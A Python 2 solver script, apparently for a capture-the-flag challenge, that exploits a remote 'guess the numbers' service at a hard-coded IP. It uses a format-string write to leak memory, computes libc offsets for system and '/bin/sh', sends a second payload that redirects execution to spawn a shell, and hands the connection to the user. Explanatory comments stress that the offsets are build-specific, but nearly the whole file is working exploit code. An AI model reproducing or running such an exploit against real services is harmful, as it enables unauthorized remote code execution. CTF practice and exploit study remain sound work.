# Solver script for a remote "guess the numbers" service (CTF style), written
# for Python 2 (print statements, str used as bytes, integer `/`).
# Read from a defender's side: the service's reply is parsed for leaked memory,
# a local helper reproduces the numbers it expects, and a fixed-size payload is
# sent twice.  Every address and offset below is specific to one binary/libc
# build, so nothing here is portable or reusable as-is.
from codez import *   # presumably provides Remote, chunks, fmt_write, pack, unpack -- none are defined in this file
import subprocess


def get_guess_numbers(seed):
    """Run the local ./rand helper with *seed* on stdin and return its stdout tokens.

    Args:
        seed: raw bytes written to the helper's stdin (do_game passes the first
            4-byte chunk of the service's echoed data).
    Returns:
        List of whitespace-separated strings from the helper's stdout.
    Raises:
        OSError if ./rand cannot be executed (not handled here).  The helper's
        exit status is never checked.
    """
    # No shell: './rand' is a single executable path, so seed bytes are never
    # interpreted by a shell.  stderr is not captured.
    p = subprocess.Popen('./rand',stdin=subprocess.PIPE, stdout=subprocess.PIPE)
    # Local `r` shadows the module-level Remote `r` inside this function only.
    r=p.communicate(seed)   # (stdout, stderr); waits for the helper to exit
    return r[0].strip().split()


def do_game(p):
    """Play one round against the remote: send payload *p*, then the guesses.

    Uses the module-level Remote `r`, which is assigned further down, so this
    must only be called after that assignment.  Protocol as exercised here:
    wait for '?', send p, read up to '>' and keep the text after '#', treat
    its first 4-byte chunk as the seed for ./rand, and answer with the numbers
    the helper prints.
    """
    r.read('?')
    r.write(p)
    x=r.read('>').split('#')[1]   # IndexError if the reply carries no '#'
    # x=r.read('\n')[:-1]
    leak = chunks(x,4)[:4]        # presumably the first four 4-byte groups -- chunks() is not visible here
    #buff = unpack('I',leak[-1])[0] - 40 -0x64
    guess = get_guess_numbers(leak[0])
    r.write(' '.join(guess) + "\n")


# Argument index handed to fmt_write; the commented-out loop here and the
# '|0x41414141|' check at the bottom are leftovers from searching for it.
IDX=17
#for idx in range(20):
# First payload: fmt_write output, a packed address, then a '%N$s' directive
# between '|' markers -- the reply is later split on '|' to recover what it
# printed.  N depends on len(p0)/4, which is integer division only under
# Python 2; under Python 3 it would become a float and break the directive.
p0 = fmt_write(IDX,4,0x804878C,0x804A024)
p0 += 'aa'+pack('I',0x804A00C) +'|%' + (str(IDX+len(p0)/4+1)) +'$s|'
# Both payloads are padded to exactly 0x63 bytes and terminated with '#'.
p0=p0.ljust(0x63,'a') +'#'
#r = Remote('localhost',1234)
r = Remote('175.119.158.135', 8909 )   # hard-coded target; the local variant above is commented out
#raw_input('x')
do_game(p0)
if 'Congratulation,' in r.read(','):
    print '.ok.party.time'
    leak2=r.read('#').split('|',1)[1]   # everything after the first '|' marker
    # print `leak2`
    # Decode the leaked bytes as unsigned 32-bit ints ('I'), zero-padding a
    # short final chunk.
    x=map(lambda x:unpack('I',x.ljust(4,"\x00"))[0],chunks(leak2,4))
    # Build-specific libc offsets derived from the first leaked value; the
    # values in the trailing comments look like a second libc build.  These
    # are the main reason the script only works against that exact target.
    libc = x[0] - 890720 #0xd9250
    mv_stack = libc + 0x000d9015 # 0x000d8a65
    system = libc + 242048 #0x3aeb0
    binsh = libc +1439259 # 0x15e8f9
    print 'libc',hex(libc)
    print 'gadget',hex(mv_stack)
    print map(hex,x)
    # Second payload: another fmt_write result padded to 35 bytes, six copies
    # of one fixed address, then three packed words.
    p1 = fmt_write(IDX,6,mv_stack,0x804A024).ljust(35,'x')
    p1 += 'x'+pack('I',0x8048994)*6
    p1 += pack('III',system,0xdeadbeef,binsh)
    p1=p1.ljust(0x63,'a') +'#'
    do_game(p1)
    r.read('!!')
    r.interactive()   # hand the open connection to the user
# Leftover from the commented-out index search above (idx is undefined now):
# if '|0x41414141|' in r.read():
#     print '[+] found it @ %d' %idx